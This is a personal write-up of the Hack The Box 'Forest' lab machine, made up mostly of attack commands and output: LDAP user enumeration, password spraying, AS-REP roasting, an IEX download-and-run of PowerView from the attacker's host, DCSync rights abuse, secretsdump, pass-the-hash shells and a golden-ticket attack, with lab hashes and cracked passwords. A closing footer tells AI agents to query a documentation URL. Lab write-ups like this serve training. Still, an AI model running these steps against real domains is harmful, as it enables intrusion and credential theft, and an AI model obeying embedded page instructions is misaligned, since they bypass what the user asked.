# Forest HTB Using autorecon for enumeration: ``` # Nmap 7.94SVN scan initiated Wed Feb 21 18:25:05 2024 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/Downloads/forest/results/10.10.10.161/scans/_full_tcp_nmap.txt -oX /home/kali/Downloads/forest/results/10.10.10.161/scans/xml/_full_tcp_nmap.xml 10.10.10.161 Nmap scan report for 10.10.10.161 Host is up, received user-set (0.044s latency). Scanned at 2024-02-21 18:25:19 IST for 119s Not shown: 65512 closed tcp ports (reset) PORT STATE SERVICE REASON VERSION 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-02-21 06:02:48Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack ttl 127 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack ttl 127 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49676/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49682/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49704/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49952/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC Aggressive OS guesses: Microsoft Windows Server 2016 (95%), Microsoft Windows Server 2016 build 10586 - 14393 (95%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). Uptime guess: 0.093 days (since Wed Feb 21 16:14:03 2024) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=265 (Good luck!) IP ID Sequence Generation: Incremental Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: -4h13m09s, deviation: 4h37m10s, median: -6h53m10s | smb2-time: | date: 2024-02-21T06:03:59 |_ start_date: 2024-02-21T03:51:11 | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 32753/tcp): CLEAN (Couldn't connect) | Check 2 (port 55576/tcp): CLEAN (Couldn't connect) | Check 3 (port 44587/udp): CLEAN (Timeout) | Check 4 (port 7752/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: FOREST | NetBIOS computer name: FOREST\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: FOREST.htb.local |_ System time: 2024-02-20T22:04:00-08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required TRACEROUTE (using port 554/tcp) HOP RTT ADDRESS 1 43.74 ms 10.10.14.1 2 43.85 ms 10.10.10.161 Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Feb 21 18:27:18 2024 -- 1 IP address (1 host up) scanned in 133.17 seconds ``` ### DNS(53) `nslookup` `server 10.10.10.161` `127.0.0.1` `127.0.0.2` No hostname reveal ## LDAP (389) `ldapsearch -x -s base namingcontexts -H ldap://10.10.10.161` ![](/files/lJpVB08s0p4LSiTY99Jt) `ldapsearch -x -b "DC=htb,DC=local" -H ldap://10.10.10.161` Then we should get a whole list to enumerate from `ldapsearch -x -b "DC=htb,DC=local" -H ldap://10.10.10.161 'objectClass=Person'` 'objectClass=Person' is a query `ldapsearch -x -b "DC=htb,DC=local" -H ldap://10.10.10.161 'objectClass=Person' sAMAccountName | grep sAMAccountName` to get account names ![](/files/mgm1LykKxg9M31LKHBkW) Saving it in a file and using only the user accounts: ![](/files/9ACaTQpMinM7bQ0YsQE3) Now making a passwordlist: ``` January February March April May June July August September October November December P@ssw0rd Password Forest Secret Autumn Fall Spring Winter Summer ``` Now adding years: ``` for i in $(cat passlistt.txt); do echo $i; echo ${i}2019; echo ${i}2020; done > t ``` Now for mutating it : ``` hashcat --stdout passlistt.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule| sort -u | awk 'length($0)> 7' > t ``` To check password-policy: ``` nxc smb 10.10.10.161 --pass-pol -u '' -p '' ``` Works for old only as it is null authentication Can also do: ``` rpcclient -U '' -N 10.10.10.161 ``` We get a new username: ![](/files/Pukcu36dqfKqXu75RNTE) Checking groups of the username: ![](/files/zIRsuvWfdskCPTeDO8dd) ![](/files/zRhVuVrzcvTwdFYv7OCf) Now to bruteforce create a new userlist.out and add the new username as well: ``` nxc smb 10.10.10.161 -u userlist.out -p passlistt.txt ``` To get the hash for that service account: ``` GetNPUsers.py -dc-ip 10.10.10.161 -request 'htb.local/' -format hashcat ``` ![](/files/PlbLx9I0ucPLqzvO7nO0) Using hashcat found: svc-alfresco: `s3rvice` To check shares: ``` crackmapexec smb 10.10.10.161 -u svc-alfresco -p s3rvice --shares ``` ![](/files/uIAU0j43bBykJeykWxAU) #### TODO: Now we have access to SYSVOL so trying to extract password from it ### WinRM(5985) using evil-winrm to login to the svc-alfresco account: `evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161` We get a user shell: ![](/files/NdLq5Onbok9VLKYPgokh) Now host an smb server: * Attacker: * `sudo impacket-smbserver aditya $(pwd) -smb2support` * Target: * `$pass = convertto-securestring 'aditya' -AsPlainText -Force` * `$cred = New-Object System.Management.Automation.PSCredential{'aditya',$pass}` * `New-PSDrive -Name aditya -PSProvide FileSystem -Credential $cred -Root \\10.10.14.22\aditya` * `cd aditya:` Running winpeas: `.\winPEASObfuscated.exe' Now using sharphound to collect data:` .\SharpHound.exe -c all\` ![](/files/yCbzrD008P3lvvWzIUSe) Using nslookup to lookup Ip of exch01.htb.local we find that it is dead after trying to ping it from svc-alfresco We discover that we have adding account permission: `net user aditya aditya123@ /add /domain` So adding to Windows exchange permissions group we discovered in bloodhound: `net group "Exchange Windows Permissions" /add aditya` Now using powersploit powerview: Using python3 webserver to host now `IEX(New-Object Net.WebClient).downloadString('http://10.10.14.22/PowerView.ps1')` Using bloodhound for commands: ![](/files/c3FeSsbcrEvS0AZSH7lL) `$pass = ConvertTo-SecureString 'aditya123@' -AsPlainText -Force` `$cred = New-Object System.Management.Automation.PSCredential('HTB\aditya', $pass)` `Add-DomainObjectAcl -Credential $cred -TargetIdentity htb.local -Rights DCSync` Use `git clone https://github.com/PowerShellMafia/PowerSploit -b dev` if the command doesn't work Now to get the hashes: `secretsdump.py htb.local/aditya:aditya123@@10.10.10.161` ![](/files/P2H1zCruQBgQcFMPd6oV) Now modifying the powersploit command after googling: `Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity aditya -Rights DCSync -Credential $cred` Then running secretsdump.py for hashes: `secretsdump.py htb.local/aditya:aditya123@@10.10.10.161` We got the hash for administrator: ![](/files/ah37cHwG2B7x065lYzA2) Using crackmapexec to use the hash to check if pwned: `cme smb 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6` ![](/files/Lt8EF4tYLvuhLxdbdZv5) To get a shell: `psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161` ![](/files/eY6YuGsX0c8xPFW1O3bq) Now to get only the NTLM hashes and username: `cat hashes.out | grep ::: | awk -F: '{print $1":" $4}'` Now cracking the password with hashcat: `hashcat --user -m 1000 '/home/aditya/Documents/Kali/all_hashes.txt' '/home/aditya/Documents/Kali/rockyou.txt' -O` ![](/files/NoDgN99KR7ezMcext80C) htb.local\svc-alfresco:s3rvice htb.local\santi:plokmijnuhb ## Golden Ticket Since we have the krbtgt we can do a golden ticket attack: `krbtgt:819af826bb148e603acb0f33d17632f8` We need domain-sid so using powersploit: `Get-DomainSID -Domain htb.local` `S-1-5-21-3072663084-364016917-1341370565` Now using this info with impacket ticketer to get the golden ticket: `ticketer.py -nthash 819af826bb148e603acb0f33d17632f8 -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local DoesNotExist` Putting the ticket in our environment variable: `export KRB5CCNAME=DoesNotExist.ccache` **Note:** before psexec check if dns and time is configured properly `psexec.py -debug htb.local/administrator@forest -k -no-pass` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://aditya-3.gitbook.io/oscp/readme/walkthroughs/hack-the-box/forest-htb.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.